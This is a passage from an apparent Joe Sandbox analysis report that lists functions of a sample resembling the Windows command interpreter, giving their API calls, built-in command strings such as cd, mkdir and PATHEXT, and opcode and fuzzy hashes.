                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: memsetwcschr
                              • String ID: 2$COMSPEC
                              • API String ID: 1764819092-1738800741
                              • Opcode ID: 67b7d9532635b88408f7fdf8ce2ffd15aa8064fbcc0e84cfd1dfe15bdfd98c80
                              • Instruction ID: be28c3af4466759b3fa88b8c37f47ddfd7a375fcf8d5c6c9d531115607d5ed44
                              • Opcode Fuzzy Hash: 67b7d9532635b88408f7fdf8ce2ffd15aa8064fbcc0e84cfd1dfe15bdfd98c80
                              • Instruction Fuzzy Hash: 36516921A1C643C5FB64BFA3A4C9379E2919FC5B84F8C4031DE0D4A6DEDE2CF844A661
                              Function 00007FF744F19A6C Relevance: 3.0, APIs: 2, Instructions: 34COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Concurrency::cancel_current_taskmalloc
                              • String ID:
                              • API String ID: 1412018758-0
                              • Opcode ID: 738c8df77e10b4e497db5d3a2d7ddec6b27d778605f8f6b2fdfcc597a874d2dd
                              • Instruction ID: 5a6b0ad1117d7046d1347a568a92a52e0f9609c87e45a28278a71ca1e95f116d
                              • Opcode Fuzzy Hash: 738c8df77e10b4e497db5d3a2d7ddec6b27d778605f8f6b2fdfcc597a874d2dd
                              • Instruction Fuzzy Hash: 79E03240E0E20BC2FB283FA368C257892605F18B40F8C2430CD0D4A7CEEE2DA895E270
                              Function 00007FF744F0CD90 Relevance: 2.5, APIs: 2, Instructions: 30memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF744F0B9A1,?,?,?,?,00007FF744F0D81A), ref: 00007FF744F0CDA6
                              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF744F0B9A1,?,?,?,?,00007FF744F0D81A), ref: 00007FF744F0CDBD
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Heap$AllocProcess
                              • String ID:
                              • API String ID: 1617791916-0
                              • Opcode ID: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
                              • Instruction ID: d10e3ccbb626919f7bc1ad86611c1fe8da04576b537b1b4bc2b994ad73cea7e5
                              • Opcode Fuzzy Hash: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
                              • Instruction Fuzzy Hash: 95F01D31A1C642C6EB14BF16F884578F7A0FB99B40B9C9434DE4E03398DF3CA441E610
                              Function 00007FF744F14C1C Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: exit
                              • String ID:
                              • API String ID: 2483651598-0
                              • Opcode ID: 9ddfc09aa9d90f0088fd16abda3ebe38fb5bbbe8bdae055d7e84e31eac367ca0
                              • Instruction ID: 7710e6d0b294a27612e4b708d2cecc0d89f52baa82a7abeca6efe723b315ab64
                              • Opcode Fuzzy Hash: 9ddfc09aa9d90f0088fd16abda3ebe38fb5bbbe8bdae055d7e84e31eac367ca0
                              • Instruction Fuzzy Hash: 8DC0123070C686C7EB1C7F3224D203995745B48201F48553CCD16852C5DE2CD8049610
                              Function 00007FF744F15508 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: DefaultUser
                              • String ID:
                              • API String ID: 3358694519-0
                              • Opcode ID: 5d8fc4fa8e665926eb49570ec356dc21582dec5ebc006b351cd7b5a4e2c943bd
                              • Instruction ID: c96279c03d28a59c3891dd195563f59f44b9e76fd5f8c5117aa551d2f084abb9
                              • Opcode Fuzzy Hash: 5d8fc4fa8e665926eb49570ec356dc21582dec5ebc006b351cd7b5a4e2c943bd
                              • Instruction Fuzzy Hash: DCE08CA2D1C252CAF7943E4360C12B49963CB78786FC85031CE0E016C8592D3C416228
                              Function 00007FF744F12E44 Relevance: 1.3, APIs: 1, Instructions: 29COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: memset
                              • String ID:
                              • API String ID: 2221118986-0
                              • Opcode ID: f77ccc38f2f42b08cf4ed255524ec50c837bf5ddba9254f495b6a2bfe7d154bb
                              • Instruction ID: 0e72c33b1ffc881289be9352e4b2ab3f500441efd4ef5ea920e8a5d69058bdd6
                              • Opcode Fuzzy Hash: f77ccc38f2f42b08cf4ed255524ec50c837bf5ddba9254f495b6a2bfe7d154bb
                              • Instruction Fuzzy Hash: 56F0B421B0D78180EF44AF97B58012992A09B48BE0F8C8334EE7D47BDDDE3CD8518300

                              Non-executed Functions

                              Function 00007FF744F05B70 Relevance: 158.5, APIs: 70, Strings: 20, Instructions: 1037memorythreadprocessCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: _wcsicmp$AttributeHeapProcThread$ErrorHandleLast$ListProcessmemset$towupper$CloseConsoleCtrlDeleteFreeHandlerInitializeUpdateiswspacewcschr$AllocCreateInfoStartup_wcsnicmp
                              • String ID: $ /K $ /K %s$"%s"$.LNK$ABOVENORMAL$AFFINITY$BELOWNORMAL$COMSPEC$HIGH$LOW$MAX$MIN$NEWWINDOW$NODE$NORMAL$REALTIME$SEPARATE$SHARED$WAIT
                              • API String ID: 1388555566-2647954630
                              • Opcode ID: 07ad72d4fce8342379dbca2ded486eaf5380facafb96a7de50d87fe1bf7b2cad
                              • Instruction ID: fd79aa2a169f07fb3572d49579fab4706779e31cad1be75348cf6dfb9cdd316f
                              • Opcode Fuzzy Hash: 07ad72d4fce8342379dbca2ded486eaf5380facafb96a7de50d87fe1bf7b2cad
                              • Instruction Fuzzy Hash: 9DA27171A0C782C6EB10BF26A4941B9E6A1FB89B84F888135DE4E477DDDF3DE444A710
                              Function 00007FF744F0E680 Relevance: 79.4, APIs: 39, Strings: 6, Instructions: 696COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: wcschr$FileSize_get_osfhandle_wcsnicmpiswspace
                              • String ID: &<|>$+: $:$:EOF$=,;$^
                              • API String ID: 511550188-726566285
                              • Opcode ID: 348cd75d81f2e43b90b1fdde602cc3fa7c7e8620821296db2d6a5e23a835ab51
                              • Instruction ID: 88b4d85716db4e1b88fef443562d81b94bbe47d91951bf4ddbf4698e33e52324
                              • Opcode Fuzzy Hash: 348cd75d81f2e43b90b1fdde602cc3fa7c7e8620821296db2d6a5e23a835ab51
                              • Instruction Fuzzy Hash: FF528F21A0C692C6FB24BF16A484279E6E1FB95B44FCC4135DE4E036D8DF3CE945A720
                              Function 00007FF744F09E50 Relevance: 67.3, APIs: 32, Strings: 6, Instructions: 811COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: _wcsnicmp$wcschr$wcstol
                              • String ID: delims=$eol=$skip=$tokens=$useback$usebackq
                              • API String ID: 1738779099-3004636944
                              • Opcode ID: 524a9485643aabb091361d6b16ddfe7c9a3cfc40a98c1ea6d538c196b1212b63
                              • Instruction ID: 32fd22ff55eb21d4409b7ad7e1617d95f3923f57e242e1382a9926c2f17be922
                              • Opcode Fuzzy Hash: 524a9485643aabb091361d6b16ddfe7c9a3cfc40a98c1ea6d538c196b1212b63
                              • Instruction Fuzzy Hash: EF725F26F0C652C6E710BF6694886B9B7F1FB94B88F894035CE0D577D8DE3CA855A320
                              Function 00007FF744F27F00 Relevance: 61.6, APIs: 28, Strings: 7, Instructions: 341memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF744F27F44
                              • _get_osfhandle.MSVCRT ref: 00007FF744F27F5C
                              • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF744F27F9E
                              • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF744F27FFF
                              • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF744F28020
                              • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF744F28036
                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF744F28061
                              • RtlFreeHeap.NTDLL ref: 00007FF744F28075
                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF744F280D6
                              • RtlFreeHeap.NTDLL ref: 00007FF744F280EA
                              • _wcsnicmp.MSVCRT ref: 00007FF744F28177
                              • _wcsnicmp.MSVCRT ref: 00007FF744F2819A
                              • _wcsnicmp.MSVCRT ref: 00007FF744F281BD
                              • _wcsnicmp.MSVCRT ref: 00007FF744F281DC
                              • _wcsnicmp.MSVCRT ref: 00007FF744F281FB
                              • _wcsnicmp.MSVCRT ref: 00007FF744F2821A
                              • _wcsnicmp.MSVCRT ref: 00007FF744F28239
                              • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF744F28291
                              • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF744F282D7
                              • FillConsoleOutputCharacterW.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF744F282FB
                              • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF744F2831A
                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF744F28364
                              • RtlFreeHeap.NTDLL ref: 00007FF744F28378
                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF744F2839A
                              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF744F283AE
                              • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF744F283E6
                              • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF744F28403
                              • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF744F28418
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Heap$Console_wcsnicmp$LockProcessShared$Free$AcquireBufferInfoReadReleaseScreen$AllocCharacterCursorFillHandleOutputPositionWrite_get_osfhandle
                              • String ID: cd $chdir $md $mkdir $pushd $rd $rmdir
                              • API String ID: 3637805771-3100821235
                              • Opcode ID: 850dcbeef8071bc1ba491ee474855cf363d50a31b10de6fe1cf39c68a2eba243
                              • Instruction ID: bdbd9e565c051ae0c14a6602d3bc232970382b21f3ade09fb21be2aee44fa69e
                              • Opcode Fuzzy Hash: 850dcbeef8071bc1ba491ee474855cf363d50a31b10de6fe1cf39c68a2eba243
                              • Instruction Fuzzy Hash: 50E15D31A0CA52CBE710BF66A484179FAA1FB49B95BC89234CD1E537D8DF3DA405E720
                              Function 00007FF744F03F90 Relevance: 60.8, APIs: 32, Strings: 2, Instructions: 1302fileCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Filememset$Attributes$ErrorLast$AllocCopyFindFirstVirtualwcschr
                              • String ID: %s$%s
                              • API String ID: 3623545644-3518022669
                              • Opcode ID: 093f3dfa9510485640a0a09713243c3e58f1671b7647742024e8090a46a21fa5
                              • Instruction ID: 975e644867c7b947a154866187c7922bb1c1e3f0e1bc732d8cddf19edb65f20f
                              • Opcode Fuzzy Hash: 093f3dfa9510485640a0a09713243c3e58f1671b7647742024e8090a46a21fa5
                              • Instruction Fuzzy Hash: 25D29031A0C642CAEB64BF6298C06B9B7A1FB85744F984135DE4E47ADDDF3DE804A710
                              Function 00007FF744F02C48 Relevance: 60.1, APIs: 32, Strings: 2, Instructions: 633COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Console$memset$BufferMode$FullInfoNamePathScreen$CharacterCursorErrorFillFlushHandleInputLastOutputPositionWrite_getch_wcsicmpwcschrwcsrchr
                              • String ID: %9d$%s
                              • API String ID: 4286035211-3662383364
                              • Opcode ID: aa057d756280f045963785478f908bc5155a264f2291532fcb8459cd8d8c127e
                              • Instruction ID: 0e2f2e07555b943ddf0d3dd69526271478d2febf05090a98ba637d94b01db27a
                              • Opcode Fuzzy Hash: aa057d756280f045963785478f908bc5155a264f2291532fcb8459cd8d8c127e
                              • Instruction Fuzzy Hash: C2529232A0DA82CAEB64BF6298942F9B7A0FB85759F884131DE0E477D8DF3CD5449710
                              Function 00007FF744F10A6C Relevance: 53.1, APIs: 23, Strings: 7, Instructions: 605COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: _wcsicmpwcschrwcsrchr$CurrentDirectoryNeedPath_wcsnicmpmemset
                              • String ID: .BAT$.CMD$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$PATH$PATHEXT$cmd
                              • API String ID: 3305344409-4288247545
                              • Opcode ID: d1ddba57f368c07054d7056cc9105995f339553d81141ebae01c3632c7bd5acf
                              • Instruction ID: 6924fec0889ef19d2bd7909bd806cf98f0304c6ba69efb2bf86a8cacc215279b
                              • Opcode Fuzzy Hash: d1ddba57f368c07054d7056cc9105995f339553d81141ebae01c3632c7bd5acf
                              • Instruction Fuzzy Hash: DC429221A0D682C6EB50BF1399902B9E6B0EF89B95F8C4135DD5E477D9DF3CE844A320
                              Function 00007FF744F14224 Relevance: 45.8, APIs: 19, Strings: 7, Instructions: 328threadprocessstringCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: AttributeProcThread$List$CloseCreateDeleteErrorHandleLastProcessmemsetwcsrchr$InfoInitializeStartupUpdateUser_local_unwind_wcsnicmplstrcmp
                              • String ID: %01C$%08X$=ExitCode$=ExitCodeAscii$COPYCMD$\XCOPY.EXE$h
                              • API String ID: 388421343-2905461000
                              • Opcode ID: 91aa278bae488f07ca69690407c5ac2f944185e63ade342298008147df7553ae
                              • Instruction ID: 5f55e176528d11ecf72b878e2fb3b1a585c613e1708ae77f08e6ae228aaec5b3
                              • Opcode Fuzzy Hash: 91aa278bae488f07ca69690407c5ac2f944185e63ade342298008147df7553ae
                              • Instruction Fuzzy Hash: E5F1FD32A0DA82C6E760BF12A4857BAF7A4FB85744F885135DE4D426D9DF3CE844DB20
                              Function 00007FF744F118D4 Relevance: 42.6, APIs: 23, Strings: 1, Instructions: 644COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: wcsrchr$towlower
                              • String ID: fdpnxsatz
                              • API String ID: 3267374428-1106894203
                              • Opcode ID: b3dec82012a9d7924db373b0270d97c85560a221f880c14b387572a373efb3d0
                              • Instruction ID: 7927c87449ab86ec829dd6fae3b56155e6a4ff1ca49b08f2967d84e1d322a32f
                              • Opcode Fuzzy Hash: b3dec82012a9d7924db373b0270d97c85560a221f880c14b387572a373efb3d0
                              • Instruction Fuzzy Hash: 63429321B0D682C6EB64BF2695942B9B6B1FB49B95F884135DE0E077CDDF3CE841A310
                              Function 00007FF744F07650 Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 461fileCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: File_get_osfhandle$memset$PathPointerReadSearchSizeType_wcsnicmpwcsrchr
                              • String ID: DPATH
